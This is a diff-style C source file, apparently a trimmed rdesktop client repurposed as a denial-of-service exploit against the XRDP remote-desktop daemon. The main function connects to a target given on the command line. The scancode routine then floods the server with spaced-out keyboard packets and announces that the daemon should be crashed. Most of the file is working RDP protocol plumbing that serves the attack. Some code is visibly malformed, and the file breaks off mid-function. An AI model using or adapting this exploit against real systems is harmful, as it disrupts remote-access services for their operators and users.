+static uint8 sec_crypted_random[SEC_MODULUS_SIZE]; + +//tcp.c +static int sock; +static struct stream in; +static struct stream out; +extern int tcp_port_rdp; + +//xwin.c +static int x_socket; +static int ix = 36; // We force the program to interact + // with X windows as little as possible + // with this counter. +//rdesktop.c +char title[32] = ""; +char username[16]; +char hostname[16]; +char keymapname[16]; +int keylayout = 0x409; +int width = 800; +int height = 600; +int tcp_port_rdp = TCP_PORT_RDP; +BOOL bitmap_compression = True; +BOOL sendmotion = True; +BOOL orders = True; +BOOL encryption = True; +BOOL desktop_save = True; +BOOL fullscreen = False; +BOOL grab_keyboard = True; +BOOL hide_decorations = False; +extern BOOL owncolmap; +// End global variables + + + +//Start function definitions +static BOOL mcs_recv_aucf(uint16 * mcs_userid); +static BOOL mcs_recv_cjcf(void); +static BOOL mcs_recv_connect_response(STREAM mcs_data); +static void rdp_send_synchronise(void); +static void mcs_send_aurq(void); +static void mcs_send_cjrq(uint16 chanid); +static void mcs_send_connect_initial(STREAM mcs_data); +static void mcs_send_edrq(void); +static void process_secondary_order(STREAM s); +static void process_update_pdu(STREAM s); +static STREAM rdp_recv(uint8 * type); +static void rdp_send_control(uint16 action); +static void rdp_send_fonts(uint16 seq); +static void rdp_send_confirm_active(void); +static void reverse(uint8 * p, int len); +STREAM sec_init(uint32 flags, int maxlen); +STREAM sec_recv(void); +STREAM tcp_init(int maxlen); +STREAM tcp_recv(int length); +int ui_select(int rdp_socket); +void * xmalloc(int size); +key_translation xkeymap_translate_key(uint32 keysym, unsigned int keycode, unsigned int state); +//End function definitions + + + +int main(int argc, char *argv[]) +{ + char server[64]; + char fullhostname[64]; + char domain[16]; + char password[16]; + char shell[128]; + char directory[32]; + BOOL prompt_password; + struct passwd *pw; + uint32 
flags; + char *p; + int c; + int username_option = 0; + encryption = False; + sendmotion = False; + flags = RDP_LOGON_NORMAL; + prompt_password = False; + domain[0] = password[0] = shell[0] = directory[0] = 0; + strcpy(keymapname, "en-us"); + + if (argc == 1) + { + fprintf(stderr, "\n[=] Usage: %s \n\n", argv[0]); + return 0; + } + + strncpy(server, argv[1], sizeof(server)); + if(!rdp_connect(server, flags, domain, password, shell, directory)) + return 0; + + fprintf(stderr, "\n[=] Connected to %s\n", argv[1]); + fprintf(stderr, "[=] Hit CTRL-C if the progress bar stops.\n\n"); + + memset(password, 0, sizeof(password)); + rdp_main_loop(); + fprintf(stderr, "\n[=] Done. Check port 3389 on the remote host.\n\n"); + return 0; +} + + +void rdp_send_scancode(uint32 time, uint16 flags, uint8 scancode) +{ + update_modifier_state(scancode, !(flags & RDP_KEYRELEASE)); + int c1, c2 = 1; + scancode = '\x1e'; // 0x1e = 0x61 ("A" after parsing. + + fprintf(stderr, "\tBe patient! It takes about a minute, the RDP packets\n"); + fprintf(stderr, "\tneed to be sent spaced apart or the daemon discards them.\n\n"); + fprintf(stderr, "[=] Progress: "); + + for (c1 = 1 ; c1 < 100 ; c1++) + { + for (c2 = 1 ; c2 < 5 ; c2++) + { + //printf("Sending scancode=0x%x, flags=0x%x\n", scancode, flags); + rdp_send_input(time, RDP_INPUT_SCANCODE, flags, scancode, 0); + //scancode++; + } + + fprintf(stderr, "*"); + sleep(1); + } + + fprintf(stderr, "\n[=] The XRDP daemon on target host should be crashed.\n"); + rdp_disconnect(); + exit(1); +} + + +/* Output an ASN.1 BER header */ +static void +ber_out_header(STREAM s, int tagval, int length) +{ + if (tagval > 0xff) + { + out_uint16_be(s, tagval); + } + else + { + out_uint8(s, tagval); + } + + if (length >= 0x80) + { + out_uint8(s, 0x82); + out_uint16_be(s, length); + } + else + out_uint8(s, length); +} + +/* Output an ASN.1 BER integer */ +static void +ber_out_integer(STREAM s, int value) +{ + ber_out_header(s, BER_TAG_INTEGER, 2); + 
out_uint16_be(s, value); +} + + +/* Parse an ASN.1 BER header */ +static BOOL +ber_parse_header(STREAM s, int tagval, int *length) +{ + int tag, len; + + if (tagval > 0xff) + { + in_uint16_be(s, tag); + } + else + { + in_uint8(s, tag)} + + + if (tag != tagval) + { + error("expected tag %d, got %d\n", tagval, tag); + return False; + } + + + in_uint8(s, len); + + if (len & 0x80) + { + len &= ~0x80; + *length = 0; + while (len--) + next_be(s, *length); + } + else + *length = len; + + return s_check(s); +} + + + +void +ensure_remote_modifiers(uint32 ev_time, key_translation tr) +{ + /* If this key is a modifier, do nothing */ + switch (tr.scancode) + { + case SCANCODE_CHAR_LSHIFT: + case SCANCODE_CHAR_RSHIFT: + case SCANCODE_CHAR_LCTRL: + case SCANCODE_CHAR_RCTRL: + case SCANCODE_CHAR_LALT: + case SCANCODE_CHAR_RALT: + case SCANCODE_CHAR_LWIN: + case SCANCODE_CHAR_RWIN: + case SCANCODE_CHAR_NUMLOCK: + return; + default: + break; + } + + /* Shift. Left shift and right shift are treated as equal; either is fine. */ + if (MASK_HAS_BITS(tr.modifiers, MapShiftMask) + != MASK_HAS_BITS(remote_modifier_state, MapShiftMask)) + { + /* The remote modifier state is not correct */ + if (MASK_HAS_BITS(tr.modifiers, MapLeftShiftMask)) + { + /* Needs left shift. Send down. */ + rdp_send_scancode(ev_time, RDP_KEYPRESS, SCANCODE_CHAR_LSHIFT); + } + else if (MASK_HAS_BITS(tr.modifiers, MapRightShiftMask)) + { + /* Needs right shift. Send down. */ + rdp_send_scancode(ev_time, RDP_KEYPRESS, SCANCODE_CHAR_RSHIFT); + } + else + { + /* Should not use this modifier. Send up for shift currently pressed. 
*/ + if (MASK_HAS_BITS(remote_modifier_state, MapLeftShiftMask)) + /* Left shift is down */ + rdp_send_scancode(ev_time, RDP_KEYRELEASE, SCANCODE_CHAR_LSHIFT); + else + /* Right shift is down */ + rdp_send_scancode(ev_time, RDP_KEYRELEASE, SCANCODE_CHAR_RSHIFT); + } + } + + /* AltGr */ + if (MASK_HAS_BITS(tr.modifiers, MapAltGrMask) + != MASK_HAS_BITS(remote_modifier_state, MapAltGrMask)) + { + /* The remote modifier state is not correct */ + if (MASK_HAS_BITS(tr.modifiers, MapAltGrMask)) + { + /* Needs this modifier. Send down. */ + rdp_send_scancode(ev_time, RDP_KEYPRESS, SCANCODE_CHAR_RALT); + } + else + { + /* Should not use this modifier. Send up. */ + rdp_send_scancode(ev_time, RDP_KEYRELEASE, SCANCODE_CHAR_RALT); + } + } + + /* NumLock */ + if (MASK_HAS_BITS(tr.modifiers, MapNumLockMask) + != MASK_HAS_BITS(remote_modifier_state, MapNumLockMask)) + { + /* The remote modifier state is not correct */ + uint16 new_remote_state = 0; + + if (MASK_HAS_BITS(tr.modifiers, MapNumLockMask)) + { + + new_remote_state |= KBD_FLAG_NUMLOCK; + } + else + { + + } + + rdp_send_input(0, RDP_INPUT_SYNCHRONIZE, 0, new_remote_state, 0); + update_modifier_state(SCANCODE_CHAR_NUMLOCK, True); + } +} + + +#ifdef EGD_SOCKET +/* Read 32 random bytes from PRNGD or EGD socket (based on OpenSSL RAND_egd) */ +static BOOL +generate_random_egd(uint8 * buf) +{ + struct sockaddr_un addr; + BOOL ret = False; + int fd; + + fd = socket(AF_UNIX, SOCK_STREAM, 0); + if (fd == -1) + return False; + + addr.sun_family = AF_UNIX; + memcpy(addr.sun_path, EGD_SOCKET, sizeof(EGD_SOCKET)); + if (connect(fd, (struct sockaddr *) &addr, sizeof(addr)) == -1) + goto err; + + /* PRNGD and EGD use a simple communications protocol */ + buf[0] = 1; /* Non-blocking (similar to /dev/urandom) */ + buf[1] = 32; /* Number of requested random bytes */ + if (write(fd, buf, 2) != 2) + goto err; + + if ((read(fd, buf, 1) != 1) || (buf[0] == 0)) /* Available? 
*/ + goto err; + + if (read(fd, buf, 32) != 32) + goto err; + + ret = True; + + err: + close(fd); + return ret; +} +#endif + + +/* Handles, for example, multi-scancode keypresses (which is not + possible via keymap-files) */ +BOOL +handle_special_keys(uint32 keysym, unsigned int state, uint32 ev_time, BOOL pressed) +{ + switch (keysym) + { + + + case XK_Break: + /* Send Break sequence E0 46 E0 C6 */ + if (pressed) + { + rdp_send_scancode(ev_time, RDP_KEYPRESS, + (SCANCODE_EXTENDED | 0x46)); + rdp_send_scancode(ev_time, RDP_KEYPRESS, + (SCANCODE_EXTENDED | 0xc6)); + } + /* No release sequence */ + return True; + + case XK_Pause: + /* According to MS Keyboard Scan Code + Specification, pressing Pause should result + in E1 1D 45 E1 9D C5. I'm not exactly sure + of how this is supposed to be sent via + RDP. The code below seems to work, but with + the side effect that Left Ctrl stays + down. Therefore, we release it when Pause + is released. */ + if (pressed) + { + rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYPRESS, 0xe1, 0); + rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYPRESS, 0x1d, 0); + rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYPRESS, 0x45, 0); + rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYPRESS, 0xe1, 0); + rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYPRESS, 0x9d, 0); + rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYPRESS, 0xc5, 0); + } + else + { + /* Release Left Ctrl */ + rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYRELEASE, + 0x1d, 0); + } + return True; + + case XK_Meta_L: /* Windows keys */ + case XK_Super_L: + case XK_Hyper_L: + case XK_Meta_R: + case XK_Super_R: + case XK_Hyper_R: + if (pressed) + { + rdp_send_scancode(ev_time, RDP_KEYPRESS, SCANCODE_CHAR_LCTRL); + rdp_send_scancode(ev_time, RDP_KEYPRESS, SCANCODE_CHAR_ESC); + } + else + { + rdp_send_scancode(ev_time, RDP_KEYRELEASE, SCANCODE_CHAR_ESC); + rdp_send_scancode(ev_time, RDP_KEYRELEASE, SCANCODE_CHAR_LCTRL); + } + return True; + } + return False; +} + 
+
+
+
+
+/* Send a self-contained ISO PDU */
+static void
+iso_send_msg(uint8 code)
+{
+ STREAM s;
+
+ s = tcp_init(11);
+
+ out_uint8(s, 3); /* version */
+ out_uint8(s, 0); /* reserved */
+ out_uint16_be(s, 11); /* length */
+
+ out_uint8(s, 6); /* hdrlen */
+ out_uint8(s, code);
+ out_uint16(s, 0); /* dst_ref */
+ out_uint16(s, 0); /* src_ref */
+ out_uint8(s, 0); /* class */
+
+ s_mark_end(s);
+ tcp_send(s);
+}
+
+/* Receive a message on the ISO layer, return code */
+static STREAM
+iso_recv_msg(uint8 * code)
+{
+ STREAM s;
+ uint16 length;
+ uint8 version;
+
+ s = tcp_recv(4);
+ if (s == NULL)
+ return NULL;
+
+ in_uint8(s, version);
+ if (version != 3)
+ {
+ error("TPKT v%d\n", version);
+ return NULL;
+ }
+
+ in_uint8s(s, 1); /* pad */
+ in_uint16_be(s, length);
+
+ s = tcp_recv(length - 4);
+ if (s == NULL)
+ return NULL;
+
+ in_uint8s(s, 1); /* hdrlen */
+ in_uint8(s, *code);
+
+ if (*code == ISO_PDU_DT)
+ {
+ in_uint8s(s, 1); /* eot */
+ return s;
+ }
+
+ in_uint8s(s, 5); /* dst_ref, src_ref, class */
+ return s;
+}
+
+/* Initialise ISO transport data packet */
+STREAM
+iso_init(int length)
+{
+ STREAM s;
+
+ s = tcp_init(length + 7);
+ s_push_layer(s, iso_hdr, 7);
+
+ return s;
+}
+
+/* Send an ISO data PDU */
+void
+iso_send(STREAM s)
+{
+ uint16 length;
+
+ s_pop_layer(s, iso_hdr);
+ length = s->end - s->p;
+
+ out_uint8(s, 3); /* version */
+ out_uint8(s, 0); /* reserved */
+ out_uint16_be(s, length);
+
+ out_uint8(s, 2); /* hdrlen */
+ out_uint8(s, ISO_PDU_DT); /* code */
+ out_uint8(s, 0x80); /* eot */
+
+ tcp_send(s);
+}
+
+/* Receive ISO transport data packet */
+STREAM
+iso_recv(void)
+{
+ STREAM s;
+ uint8 code;
+
+ s = iso_recv_msg(&code);
+ if (s == NULL)
+ return NULL;
+
+ if (code != ISO_PDU_DT)
+ {
+ error("expected DT, got 0x%x\n", code);
+ return NULL;
+ }
+
+ return s;
+}
+
+/* Establish a connection up to the ISO layer */
+BOOL
+iso_connect(char *server)
+{
+ uint8 code;
+
+ if (!tcp_connect(server))
+ return False;
+
+ iso_send_msg(ISO_PDU_CR);
+
+ if (iso_recv_msg(&code) == NULL)
+ return False;
+
+ if (code != ISO_PDU_CC)
+ {
+ error("expected CC, got 0x%x\n", code);
+ tcp_disconnect();
+ return False;
+ }
+
+ return True;
+}
+
+/* Disconnect from the ISO layer */
+void
+iso_disconnect(void)
+{
+ iso_send_msg(ISO_PDU_DR);
+ tcp_disconnect();
+}
+
+
+
+/* Generate a session key and RC4 keys, given client and server randoms */
+static void
+licence_generate_keys(uint8 * client_key, uint8 * server_key, uint8 * client_rsa)
+{
+ uint8 session_key[48];
+ uint8 temp_hash[48];
+
+ /* Generate session key - two rounds of sec_hash_48 */
+ sec_hash_48(temp_hash, client_rsa, client_key, server_key, 65);
+ sec_hash_48(session_key, temp_hash, server_key, client_key, 65);
+
+ /* Store first 16 bytes of session key, for generating signatures */
+ memcpy(licence_sign_key, session_key, 16);
+
+ /* Generate RC4 key */
+ sec_hash_16(licence_key, &session_key[16], client_key, server_key);
+}
+
+
+
+/* Send a licence request packet */
+static void
+licence_send_request(uint8 * client_random, uint8 * rsa_data, char *user, char *host)
+{
+ uint32 sec_flags = SEC_LICENCE_NEG;
+ uint16 userlen = strlen(user) + 1;
+ uint16 hostlen = strlen(host) + 1;
+ uint16 length = 128 + userlen + hostlen;
+ STREAM s;
+
+ s = sec_init(sec_flags, length + 2);
+
+ out_uint16_le(s, LICENCE_TAG_REQUEST);
+ out_uint16_le(s, length);
+
+ out_uint32_le(s, 1);
+ out_uint16(s, 0);
+ out_uint16_le(s, 0xff01);
+
+ out_uint8p(s, client_random, SEC_RANDOM_SIZE);
+ out_uint16(s, 0);
+ out_uint16_le(s, (SEC_MODULUS_SIZE + SEC_PADDING_SIZE));
+ out_uint8p(s, rsa_data, SEC_MODULUS_SIZE);
+ out_uint8s(s, SEC_PADDING_SIZE);
+
+ out_uint16(s, LICENCE_TAG_USER);
+ out_uint16(s, userlen);
+ out_uint8p(s, user, userlen);
+
+ out_uint16(s, LICENCE_TAG_HOST);
+ out_uint16(s, hostlen);
+ out_uint8p(s, host, hostlen);
+
+ s_mark_end(s);
+ sec_send(s, sec_flags);
+}
+
+/* Process a licence demand packet */
+static void
+licence_process_demand(STREAM s)
+{
+ uint8 null_data[SEC_MODULUS_SIZE];
+ uint8 *server_random;
+#ifdef SAVE_LICENCE
+ uint8 signature[LICENCE_SIGNATURE_SIZE];
+ uint8 hwid[LICENCE_HWID_SIZE];
+ uint8 *licence_data;
+ int licence_size;
+ RC4_KEY crypt_key;
+#endif
+
+ /* Retrieve the server random from the incoming packet */
+ in_uint8p(s, server_random, SEC_RANDOM_SIZE);
+
+ /* We currently use null client keys. This is a bit naughty but, hey,
+ the security of licence negotiation isn't exactly paramount. */
+ memset(null_data, 0, sizeof(null_data));
+ licence_generate_keys(null_data, server_random, null_data);
+
+#ifdef SAVE_LICENCE
+ licence_size = load_licence(&licence_data);
+ if (licence_size != -1)
+ {
+ /* Generate a signature for the HWID buffer */
+ licence_generate_hwid(hwid);
+ sec_sign(signature, 16, licence_sign_key, 16, hwid, sizeof(hwid));
+
+ /* Now encrypt the HWID */
+ RC4_set_key(&crypt_key, 16, licence_key);
+ RC4(&crypt_key, sizeof(hwid), hwid, hwid);
+
+ licence_present(null_data, null_data, licence_data, licence_size, hwid, signature);
+ xfree(licence_data);
+ return;
+ }
+#endif
+
+ licence_send_request(null_data, null_data, username, hostname);
+}
+
+
+/* Process a licence packet */
+void
+licence_process(STREAM s)
+{
+ uint16 tag;
+
+ in_uint16_le(s, tag);
+ in_uint8s(s, 2); /* length */
+
+ switch (tag)
+ {
+ case LICENCE_TAG_DEMAND:
+
+ licence_process_demand(s);
+ break;
+
+ case LICENCE_TAG_AUTHREQ:
+// licence_process_authreq(s);
+ break;
+
+ case LICENCE_TAG_ISSUE:
+// licence_process_issue(s);
+ break;
+
+ case LICENCE_TAG_REISSUE:
+ break;
+
+ case LICENCE_TAG_RESULT:
+ break;
+
+
+ }
+}
+
+
+/* Establish a connection up to the MCS layer */
+BOOL
+mcs_connect(char *server, STREAM mcs_data)
+{
+ if (!iso_connect(server))
+ return False;
+
+ mcs_send_connect_initial(mcs_data);
+ if (!mcs_recv_connect_response(mcs_data))
+ goto error;
+
+ mcs_send_edrq();
+
+ mcs_send_aurq();
+ if (!mcs_recv_aucf(&mcs_userid))
+ goto error;
+
+ mcs_send_cjrq(mcs_userid + 1001);
+ if (!mcs_recv_cjcf())
+ goto error;
+
+ mcs_send_cjrq(MCS_GLOBAL_CHANNEL);
+ if (!mcs_recv_cjcf())
+ goto error;
+
+ return True;
+
+ error:
+ iso_disconnect();
+ return False;
+}
+
+/* Disconnect from the MCS layer */
+void
+mcs_disconnect(void)
+{
+ iso_disconnect();
+}
+
+
+
+/* Initialise an MCS transport data packet */
+STREAM
+mcs_init(int length)
+{
+ STREAM s;
+
+ s = iso_init(length + 8);
+ s_push_layer(s, mcs_hdr, 8);
+
+ return s;
+}
+
+
+/* Output a DOMAIN_PARAMS structure (ASN.1 BER) */
+static void
+mcs_out_domain_params(STREAM s, int max_channels, int max_users, int max_tokens, int max_pdusize)
+{
+ ber_out_header(s, MCS_TAG_DOMAIN_PARAMS, 32);
+ ber_out_integer(s, max_channels);
+ ber_out_integer(s, max_users);
+ ber_out_integer(s, max_tokens);
+ ber_out_integer(s, 1); /* num_priorities */
+ ber_out_integer(s, 0); /* min_throughput */
+ ber_out_integer(s, 1); /* max_height */
+ ber_out_integer(s, max_pdusize);
+ ber_out_integer(s, 2); /* ver_protocol */
+}
+
+
+
+
+/* Receive an MCS transport data packet */
+STREAM
+mcs_recv(void)
+{
+ uint8 opcode, appid, length;
+ STREAM s;
+
+ s = iso_recv();
+ if (s == NULL)
+ return NULL;
+
+ in_uint8(s, opcode);
+ appid = opcode >> 2;
+ if (appid != MCS_SDIN)
+ {
+ if (appid != MCS_DPUM)
+ {
+ error("expected data, got %d\n", opcode);
+ }
+ return NULL;
+ }
+
+ in_uint8s(s, 5); /* userid, chanid, flags */
+ in_uint8(s, length);
+ if (length & 0x80)
+ in_uint8s(s, 1); /* second byte of length */
+
+ return s;
+}
+
+
+
+/* Expect a AUcf message (ASN.1 PER) */
+static BOOL
+mcs_recv_aucf(uint16 * mcs_userid)
+{
+ uint8 opcode, result;
+ STREAM s;
+
+ s = iso_recv();
+ if (s == NULL)
+ return False;
+
+ in_uint8(s, opcode);
+ if ((opcode >> 2) != MCS_AUCF)
+ {
+ error("expected AUcf, got %d\n", opcode);
+ return False;
+ }
+
+ in_uint8(s, result);
+ if (result != 0)
+ {
+ error("AUrq: %d\n", result);
+ return False;
+ }
+
+ if (opcode & 2)
+ in_uint16_be(s, *mcs_userid);
+
+ return s_check_end(s);
+}
+
+
+/* Expect a CJcf message (ASN.1 PER) */
+static BOOL
+mcs_recv_cjcf(void)
+{
+ uint8 opcode, result;
+ STREAM s;
+
+ s = iso_recv();
+ if (s == NULL)
+ return False;
+
+ in_uint8(s, opcode);
+ if ((opcode >> 2) != MCS_CJCF)
+ {
+ error("expected CJcf, got %d\n", opcode);
+ return False;
+ }
+
+ in_uint8(s, result);
+ if (result != 0)
+ {
+ error("CJrq: %d\n", result);
+ return False;
+ }
+
+ in_uint8s(s, 4); /* mcs_userid, req_chanid */
+ if (opcode & 2)
+ in_uint8s(s, 2); /* join_chanid */
+
+ return s_check_end(s);
+}
+
+
+/* Parse a DOMAIN_PARAMS structure (ASN.1 BER) */
+static BOOL
+mcs_parse_domain_params(STREAM s)
+{
+ int length;
+
+ ber_parse_header(s, MCS_TAG_DOMAIN_PARAMS, &length);
+ in_uint8s(s, length);
+
+ return s_check(s);
+}
+
+
+/* Expect a MCS_CONNECT_RESPONSE message (ASN.1 BER) */
+static BOOL
+mcs_recv_connect_response(STREAM mcs_data)
+{
+ uint8 result;
+ int length;
+ STREAM s;
+
+ s = iso_recv();
+ if (s == NULL)
+ return False;
+
+ ber_parse_header(s, MCS_CONNECT_RESPONSE, &length);
+
+ ber_parse_header(s, BER_TAG_RESULT, &length);
+ in_uint8(s, result);
+ if (result != 0)
+ {
+ error("MCS connect: %d\n", result);
+ return False;
+ }
+
+ ber_parse_header(s, BER_TAG_INTEGER, &length);
+ in_uint8s(s, length); /* connect id */
+
+ mcs_parse_domain_params(s);
+
+ ber_parse_header(s, BER_TAG_OCTET_STRING, &length);
+ if (length > mcs_data->size)
+ {
+ error("MCS data length %d\n", length);
+ length = mcs_data->size;
+ }
+
+ in_uint8a(s, mcs_data->data, length);
+ mcs_data->p = mcs_data->data;
+ mcs_data->end = mcs_data->data + length;
+
+ return s_check_end(s);
+}
+
+
+/* Send an MCS transport data packet */
+void
+mcs_send(STREAM s)
+{
+ uint16 length;
+
+ s_pop_layer(s, mcs_hdr);
+ length = s->end - s->p - 8;
+ length |= 0x8000;
+
+ out_uint8(s, (MCS_SDRQ << 2));
+ out_uint16_be(s, mcs_userid);
+ out_uint16_be(s, MCS_GLOBAL_CHANNEL);
+ out_uint8(s, 0x70); /* flags */
+ out_uint16_be(s, length);
+
+ iso_send(s);
+}
+
+
+/* Send an AUrq message (ASN.1 PER) */
+static void
+mcs_send_aurq(void)
+{
+ STREAM s;
+
+ s = iso_init(1);
+
+ out_uint8(s, (MCS_AURQ << 2));
+
+ s_mark_end(s);
+ iso_send(s);
+}
+
+
+/* Send a CJrq message (ASN.1 PER) */
+static void
+mcs_send_cjrq(uint16 chanid)
+{
+ STREAM s;
+
+ s = iso_init(5);
+
+ out_uint8(s, (MCS_CJRQ << 2));
+ out_uint16_be(s, mcs_userid);
+ out_uint16_be(s, chanid);
+
+ s_mark_end(s);
+ iso_send(s);
+}
+
+
+/* Send an MCS_CONNECT_INITIAL message (ASN.1 BER) */
+static void
+mcs_send_connect_initial(STREAM mcs_data)
+{
+ int datalen = mcs_data->end - mcs_data->data;
+ int length = 7 + 3 * 34 + 4 + datalen;
+ STREAM s;
+
+ s = iso_init(length + 5);
+
+ ber_out_header(s, MCS_CONNECT_INITIAL, length);
+ ber_out_header(s, BER_TAG_OCTET_STRING, 0); /* calling domain */
+ ber_out_header(s, BER_TAG_OCTET_STRING, 0); /* called domain */
+
+ ber_out_header(s, BER_TAG_BOOLEAN, 1);
+ out_uint8(s, 0xff); /* upward flag */
+
+ mcs_out_domain_params(s, 2, 2, 0, 0xffff); /* target params */
+ mcs_out_domain_params(s, 1, 1, 1, 0x420); /* min params */
+ mcs_out_domain_params(s, 0xffff, 0xfc17, 0xffff, 0xffff); /* max params */
+
+ ber_out_header(s, BER_TAG_OCTET_STRING, datalen);
+ out_uint8p(s, mcs_data->data, datalen);
+
+ s_mark_end(s);
+ iso_send(s);
+}
+
+
+/* Send an EDrq message (ASN.1 PER) */
+static void
+mcs_send_edrq(void)
+{
+ STREAM s;
+
+ s = iso_init(5);
+
+ out_uint8(s, (MCS_EDRQ << 2));
+ out_uint16_be(s, 1); /* height */
+ out_uint16_be(s, 1); /* interval */
+
+ s_mark_end(s);
+ iso_send(s);
+}
+
+
+/* Process data PDU */
+static void
+process_data_pdu(STREAM s)
+{
+ uint8 data_pdu_type;
+
+ in_uint8s(s, 8); /* shareid, pad, streamid, length */
+ in_uint8(s, data_pdu_type);
+ in_uint8s(s, 3); /* compress_type, compress_len */
+
+ switch (data_pdu_type)
+ {
+ case RDP_DATA_PDU_UPDATE:
+ process_update_pdu(s);
+ break;
+
+ case RDP_DATA_PDU_POINTER:
+ //process_pointer_pdu(s);
+ break;
+
+ case RDP_DATA_PDU_BELL:
+ //ui_bell();
+ break;
+
+ case RDP_DATA_PDU_LOGON:
+ /* User logged on */
+ break;
+
+ }
+}
+
+
+/* Respond to a demand active PDU */
+static void
+process_demand_active(STREAM s)
+{
+ uint8 type;
+
+ in_uint32_le(s, rdp_shareid);
+
+
+
+ rdp_send_confirm_active();
+ rdp_send_synchronise();
+ rdp_send_control(RDP_CTL_COOPERATE);
+ rdp_send_control(RDP_CTL_REQUEST_CONTROL);
+ rdp_recv(&type); /* RDP_PDU_SYNCHRONIZE */
+ rdp_recv(&type); /* RDP_CTL_COOPERATE */
+ rdp_recv(&type); /* RDP_CTL_GRANT_CONTROL */
+ rdp_send_input(0, RDP_INPUT_SYNCHRONIZE, 0, 0, 0);
+ rdp_send_fonts(1);
+ rdp_send_fonts(2);
+ rdp_recv(&type); /* RDP_PDU_UNKNOWN 0x28 */
+ reset_order_state();
+}
+
+
+/* Process an order PDU */
+void
+process_orders(STREAM s)
+{
+ RDP_ORDER_STATE *os = &order_state;
+ uint32 present;
+ uint16 num_orders;
+ uint8 order_flags;
+ int size, processed = 0;
+ BOOL delta;
+
+ in_uint8s(s, 2); /* pad */
+ in_uint16_le(s, num_orders);
+ in_uint8s(s, 2); /* pad */
+
+ while (processed < num_orders)
+ {
+ in_uint8(s, order_flags);
+
+ if (!(order_flags & RDP_ORDER_STANDARD))
+ {
+ error("order parsing failed\n");
+ break;
+ }
+
+ if (order_flags & RDP_ORDER_SECONDARY)
+ {
+ process_secondary_order(s);
+ }
+ else
+ {
+ if (order_flags & RDP_ORDER_CHANGE)
+ {
+ in_uint8(s, os->order_type);
+ }
+
+ switch (os->order_type)
+ {
+ case RDP_ORDER_TRIBLT:
+ case RDP_ORDER_TEXT2:
+ size = 3;
+ break;
+
+ case RDP_ORDER_PATBLT:
+ case RDP_ORDER_MEMBLT:
+ case RDP_ORDER_LINE:
+ size = 2;
+ break;
+
+ default:
+ size = 1;
+ }
+
+
+ delta = order_flags & RDP_ORDER_DELTA;
+
+ }
+ processed++;
+ }
+
+ if (s->p != next_packet)
+ error("%d bytes remaining\n", (int) (next_packet - s->p));
+}
+
+
+/* Process a secondary order */
+static void
+process_secondary_order(STREAM s)
+{
+ uint16 length;
+ uint8 type;
+ uint8 *next_order;
+
+ in_uint16_le(s, length);
+ in_uint8s(s, 2); /* flags */
+ in_uint8(s, type);
+ next_order = s->p + length + 7;
+ s->p = next_order;
+}
+
+
+/* Process an update PDU */
+static void +process_update_pdu(STREAM s) +{ + uint16 update_type; + + in_uint16_le(s, update_type); + + switch (update_type) + { + case RDP_UPDATE_ORDERS: + process_orders(s); + break; + + case RDP_UPDATE_SYNCHRONIZE: + break; + } +} + + +/* Initialise an RDP packet */ +static STREAM +rdp_init(int maxlen) +{ + STREAM s; + + s = sec_init(encryption ? SEC_ENCRYPT : 0, maxlen + 6); + s_push_layer(s, rdp_hdr, 6); + + return s; +} + +/* Send an RDP packet */ +static void +rdp_send(STREAM s, uint8 pdu_type) +{ + uint16 length; + + s_pop_layer(s, rdp_hdr); + length = s->end - s->p; + + out_uint16_le(s, length); + out_uint16_le(s, (pdu_type | 0x10)); /* Version 1 */ + out_uint16_le(s, (mcs_userid + 1001)); + + sec_send(s, encryption ? SEC_ENCRYPT : 0); +} + +/* Receive an RDP packet */ +static STREAM +rdp_recv(uint8 * type) +{ + static STREAM rdp_s; + uint16 length, pdu_type; + + if ((rdp_s == NULL) || (next_packet >= rdp_s->end)) + { + rdp_s = sec_recv(); + if (rdp_s == NULL) + return NULL; + + next_packet = rdp_s->p; + } + else + { + rdp_s->p = next_packet; + } + + in_uint16_le(rdp_s, length); + /* 32k packets are really 8, keepalive fix */ + if (length == 0x8000) + { + next_packet += 8; + *type = 0; + return rdp_s; + } + in_uint16_le(rdp_s, pdu_type); + in_uint8s(rdp_s, 2); /* userid */ + *type = pdu_type & 0xf; + + + next_packet += length; + return rdp_s; +} + +/* Initialise an RDP data packet */ +static STREAM +rdp_init_data(int maxlen) +{ + STREAM s; + + s = sec_init(encryption ? 
SEC_ENCRYPT : 0, maxlen + 18); + s_push_layer(s, rdp_hdr, 18); + + return s; +} + +/* Send an RDP data packet */ +static void +rdp_send_data(STREAM s, uint8 data_pdu_type) +{ + uint16 length; + + s_pop_layer(s, rdp_hdr); + length = s->end - s->p; + + out_uint16_le(s, length); + out_uint16_le(s, (RDP_PDU_DATA | 0x10)); + out_uint16_le(s, (mcs_userid + 1001)); + + out_uint32_le(s, rdp_shareid); + out_uint8(s, 0); /* pad */ + out_uint8(s, 1); /* streamid */ + out_uint16_le(s, (length - 14)); + out_uint8(s, data_pdu_type); + out_uint8(s, 0); /* compress_type */ + out_uint16(s, 0); /* compress_len */ + + sec_send(s, encryption ? SEC_ENCRYPT : 0); +} + +/* Output a string in Unicode */ +void +rdp_out_unistr(STREAM s, char *string, int len) +{ + int i = 0, j = 0; + + len += 2; + + while (i < len) + { + s->p[i++] = string[j++]; + s->p[i++] = 0; + } + + s->p += len; +} + +/* Parse a logon info packet */ +static void +rdp_send_logon_info(uint32 flags, char *domain, char *user, + char *password, char *program, char *directory) +{ + int len_domain = 2 * strlen(domain); + int len_user = 2 * strlen(user); + int len_password = 2 * strlen(password); + int len_program = 2 * strlen(program); + int len_directory = 2 * strlen(directory); + uint32 sec_flags = encryption ? 
